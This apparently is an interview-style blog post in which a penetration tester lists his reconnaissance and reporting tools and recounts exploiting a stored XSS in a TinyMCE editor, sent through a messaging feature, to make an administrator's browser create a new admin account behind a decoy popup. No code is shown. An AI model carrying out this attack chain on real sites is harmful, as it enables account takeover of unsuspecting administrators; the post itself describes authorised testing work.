How Santhosh Tuppad Tests for Security – Part 2

What tools can be a value-add for your security testing activity?

The famous tool that I use is “Brain” and it’s greatest “Capabilities”

Note that, I explore a lot of tools during the journey of penetration testing as I come from a context-driven school of hackers.

 

A. Understanding the business(Heuristics to learn)

• Talk to the key people
• Communicate with cross-functional teams
• Take a look at the specifications document
• Use the software if its available on the web in order to learn
• Read about similar businesses
• Browse through exploits-database if similar businesses had any kind of serious “hacking stories” in order to learn from them and also utilise the ideas in the project.
• Software tools like “Passive Recon(naissance) add-on”, “Netcraft Site Report”, Maltego XL (If I have the licence), Whois, NMap, Fingerprinting tools, WayBackMachine (To check how was the evolution of a particular web application),GoogleDorks(I love this).

 

B. Creation of the Report

• Videos for Proof of Concept (I use many different screen recording software based on the context of the operating system that I am using. Mostly malware free software/ open-source based on my due diligence)
• Screenshots wherever applicable (For web: FireShot / GreenShot /Or even Print Screen feature J)
• Detailed description covering minute aspects of the vulnerabilities
• Add my contact details and availability (If required. Usually, a night-crawler. However, I prefer to be available during the client’s time-zones if insisted).

If you perform manual tests please specify

Well, I never understood what “manual” tests are. I have never heard of “manual programming” or anything like that. Everything comes from the brain and applying various thinking skills.

I use a tool-assisted exploratory approach to perform security / penetration tests and sometimes it is without any tool-assisted, but the brain itself can be a tool to me. For example: I can run OWASP Top 10 using scanners, but they are merely instructions and cannot really come up with creative and intelligent attack vectors or payloads in order to discover the potential vulnerability

So, my answer is:

I use mixed approaches which includes Scanners ONLY + Brain Assisted Tests for OWASP Top 10 or any other kinds of attacks + Scanners and Tools Assisted Exploratory Testing.

What kind of vulnerabilities have you found in websites? Please specify

Starting from encryption based vulnerabilities to SQL injection, Authentication based weaknesses / vulnerabilities, Authorization, Buggy SSL implementation,Man in the Middle Attacks, Network Interception, Reverse Engineering, Cross-site Request Forgery, Arbitrary unvalidated inputs, code injection, Database HiJacking, Out of Memory, dDoS (I wouldn’t really call this as a vulnerability though), finding sensitive data captured in the logs (Log file analysis), HTTP requests and response related vulnerabilities and anywhere my brain could think of finding a loophole. They also could be a sequence of activities performed on the victim or target or a software in order to achieve the hacking goals.

Have you ever tried to test if vulnerability in a website that you find is really exploitable?

Yes, I do that always with mental modelling and then writing an exploit to demonstrate the severity of the discovered vulnerability.

I would love to share an experience of exploitation which I performed in a website. This was an education platform (New York based NGO) and it had a lot of features and various roles / authorisations.

Roles: Student, Teacher and Administrator

Authorisation Levels: Pretty good implementation

Identification: I found out cross-site scripting vulnerability in the TinyMCE editor image insert feature which was integrated within the application.

After identification: I started to think what can I do with this vulnerability? How can I show the severity or damage potential of this XSS vulnerability that I have found. I started to use my feature touring mindmap to identify the features that connect me to different roles in the application. Well, I saw the “MESSAGING” feature in the application where you can send a message to the administrator or teacher being a student. The exploit I was thinking of goes this way — Write AJAX / JavaScript (Malicious) which will force the administrator to create a new administrator or delete all users or add more users and any function that I wanted to execute being a student role

AJAX Snippet of Code Writing: Here, I took the help of my team member who has programmer skills in writing AJAX scripts. I shared my idea of exploit and he helped me in writing this AJAX script in few minutes (less than 15 minutes) which was capable of executing the XSS via Messaging System / Feature for Administrator Role and then creating a new administrator with the given credentials in the AJAX request embedded in the XSS exploit

In short, “Logon as a Student” → “Create malicious AJAX XSS exploit” → “Send the exploit script to Administrator through the TinyMCE editor / Messaging Feature” → “Administrator opens the message and sees a popup box which says, Welcome to the Mail 2.0” (This message is set to not make the victim feel sceptical about this exploit) → And once the popup shows up, it means that our script has or is running in stealth mode (which means, nothing is shown on the UI so that administrator will feel doubtful or something fishy is going on).

Result: I logged in with the credentials of new admin created (the exploit) and I have gained access to the full application and I can do anything now. In short, “I am the Supreme / Super Admin”.